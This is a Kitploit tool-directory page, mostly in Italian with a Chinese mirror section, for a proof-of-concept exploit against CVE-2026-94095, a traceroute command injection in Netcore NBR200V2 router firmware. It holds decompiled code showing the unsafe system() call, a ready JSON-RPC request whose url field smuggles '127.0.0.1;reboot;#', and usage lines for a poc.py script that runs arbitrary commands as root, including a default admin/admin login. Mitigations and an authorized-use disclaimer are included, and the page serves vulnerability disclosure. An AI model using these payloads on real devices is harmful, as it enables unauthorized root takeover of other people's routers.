Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-94095 — PoC per CVE-2026-94095, un'iniezione di comandi traceroute nel firmware Netcore NBR200V2 tramite ubus JSON-RPC, che consente RCE come root per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/hackspeak/cve-2026-94095
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSicurezza Hardware e IoTPaper e Ricerca
GitHubhackspeak/cve-2026-94095

CVE-2026-94095

PoC per CVE-2026-94095, un'iniezione di comandi traceroute nel firmware Netcore NBR200V2 tramite ubus JSON-RPC, che consente RCE come root per test autorizzati.

17h 27m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

Netcore NBR200V2 - Iniezione di comandi remoti nella funzionalità di diagnostica Traceroute (CVE-2026-94095)

CampoValore
VendorNetcore
ModelloNBR200V2
Versione FirmwareV1.3.241127.071246
Componente interessato/usr/bin/network_tools
Tipo di vulnerabilitàOS Command Injection (CWE-74 / CWE-77)
CVSS 3.19.9 (Critico)
Vettore di attaccoRemoto (ubus JSON-RPC)
PrerequisitoEndpoint ubus raggiungibile + una sessione a bassi privilegi (sid)
Stato del vendorContattato in anticipo; nessuna risposta; nessuna patch al momento della divulgazione

Descrizione

Il firmware V1.3.241127.071246 del Netcore NBR200V2 contiene una vulnerabilità di iniezione di comandi remoti nella funzionalità di diagnostica traceroute. Il gestore del traceroute accetta un valore url controllato dall'attaccante tramite ubus JSON-RPC, lo concatena in un comando shell ed esegue il comando risultante. Un attaccante remoto può sfruttare questa falla per eseguire comandi shell arbitrari, riavviare il dispositivo o ottenere il pieno compromesso del sistema.

Catena di vulnerabilità

La richiesta remota viene accettata come ubus JSON-RPC:

root@kitploit:~
POST /ubus {"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"<attacker-controlled>","max_hop":1,"wanid":0}]}

La mappatura del metodo ubus instrada la richiesta a sub_401BD8:

root@kitploit:~
object.name = "network_tools"; object.methods = 0x412f4c; "tools_traceroute" -> sub_401BD8

sub_401BD8 analizza i dati JSON-RPC e li inoltra a tools_traceroute():

root@kitploit:~
blobmsg_parse(&off_412FA4, 4, &v21, a5 + 4, (v6 & 0xFFFFFF) - 4);
...
v25[0] = v18;              // action
v25[1] = v7;               // url
v25[2] = _bswapsi2(*v8);   // max_hop
...
result = tools_traceroute((int)v25);

tools_traceroute() costruisce un comando shell utilizzando il valore url non attendibile:

root@kitploit:~
snprintf(
    v4, 0x100u,
    "(traceroute %s -m %d > %s && echo \"traceroute ending\" >> %s; touch %s)&",
    v2, *(_DWORD *)(a1 + 8), "/tmp/traceroute.txt", "/tmp/traceroute.txt", "/tmp/.tracroute_end");
system(v4);

La vulnerabilità è strutturalmente identica al problema del ping, ma raggiunge un sink e un percorso di esecuzione diversi. Poiché viene utilizzato system(), i separatori di comando come ;, && e i commenti shell vengono rispettati. La funzionalità di diagnostica diventa quindi una primitiva di esecuzione di comandi generica.

Proof of Concept

root@kitploit:~
POST /ubus
Content-Type: application/json

{"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"127.0.0.1;reboot;#","max_hop":1}]}

Effetto previsto: il router esegue reboot durante l'elaborazione del job traceroute. Comandi shell arbitrari possono essere sostituiti a reboot.

Vulnerabilità correlate (stesso batch)

  • CVE-2026-94096 — percorso di configurazione IP LAN (stesso binario, stesso pattern).
  • CVE-2026-94097 — endpoint di diagnostica CGI (CVSS 10.0).

Tutte e tre raggiungono lo stesso /usr/bin/network_tools; le funzioni di diagnostica in questo binario condividono lo stesso pattern non sicuro, quindi correggere un singolo punto di ingresso non è sufficiente.

Remediation

Nessuna patch del vendor al momento della divulgazione. Mitigazioni temporanee:

  1. Non esporre l'interfaccia di gestione a reti non attendibili; rimuovere tutte le mappature di gestione lato WAN;
  2. Cambiare le credenziali predefinite e applicare password forti e ruotate (l'autenticazione ubus è il prerequisito per questo attacco);
  3. Limitare l'endpoint ubus / di gestione a una subnet operativa dedicata tramite firewall;
  4. Monitorare gli aggiornamenti firmware del vendor e verificare le correzioni per CVE-2026-94095/94096/94097 insieme.

Crediti

Divulgazione da parte del ricercatore indipendente che ha pubblicato il write-up tecnico e coordinato (senza successo) con il vendor.


分发镜像说明(中文)

本仓库为 CVE-2026-94095(Netcore NBR200V2 traceroute 命令注入) 漏洞 PoC 的中转分发镜像(英文技术披露见上方 CVE-2026-94095.md)。内容依据公开披露文档整理,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Vulnerability Summary

  • CVE-2026-94095(同批:CVE-2026-94096 / CVE-2026-94097)
  • 影响产品:Netcore NBR200V2 企业路由器,固件 V1.3.241127.071246
  • 受影响组件:/usr/bin/network_tools(traceroute 诊断功能)
  • 类型:OS 命令注入(CWE-74 / CWE-77)
  • CVSS 3.1:9.9(Critical);CVSS 4.0:8.6;CVSS 2.0:9.0
  • 攻击面:ubus JSON-RPC 端点(POST /ubus)
  • 前置条件:可访问 ubus 接口 + 一个低权限会话(sid);弱口令/默认口令会显著降低门槛
  • 修复状态:披露者提前联系厂商,厂商零回应,暂无官方补丁

核心原理:tools_traceroute() 用 snprintf 把攻击者可控的 url 参数拼进 shell 命令,再交给 system() 执行;url 未做任何过滤/转义,分号 ;、&&、管道、注释符 # 均有效——诊断功能因此变成通用命令执行原语。

目录结构 / Layout

root@kitploit:~
CVE-2026-94095.md   —— 公开披露整理(调用链、反编译片段、PoC 请求)
poc.py              —— 可用 PoC 脚本(ubus JSON-RPC 注入,纯标准库)

环境与用法 / Requirements & Usage

  • 目标:未修复的 Netcore NBR200V2(实验室设备);需可访问 POST /ubus 与一个有效 sid
  • 依赖:Python 3(纯标准库,零第三方依赖)
root@kitploit:~
# 已有 sid:
python3 poc.py --target http://192.168.1.1 --sid <SESSION_ID> --cmd "id"

# 用账号口令获取 sid(弱口令/默认口令场景):
python3 poc.py --target http://192.168.1.1 --user admin --password admin --cmd "reboot"

⚠️ 命令会被拼接为 127.0.0.1;<命令>;# 注入 url 参数;reboot 会直接重启设备,请仅在授权/可销毁环境测试。

免责声明 / Disclaimer

本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的设备运行。利用会以设备最高权限执行任意命令(默认运行于 root 上下文),请在可销毁的实验室环境中测试。

归属与许可 / Attribution & License

  • 漏洞由独立研究者公开披露并整理利用链;本仓库为其公开材料的镜像与 PoC 实现。
  • 分发仓库采用 MIT License(见 LICENSE)。

参考链接 / References

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-94095
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-94095
  • 第三方分析(VulDB):https://vuldb.com/vuln/408024
Scarica lo strumento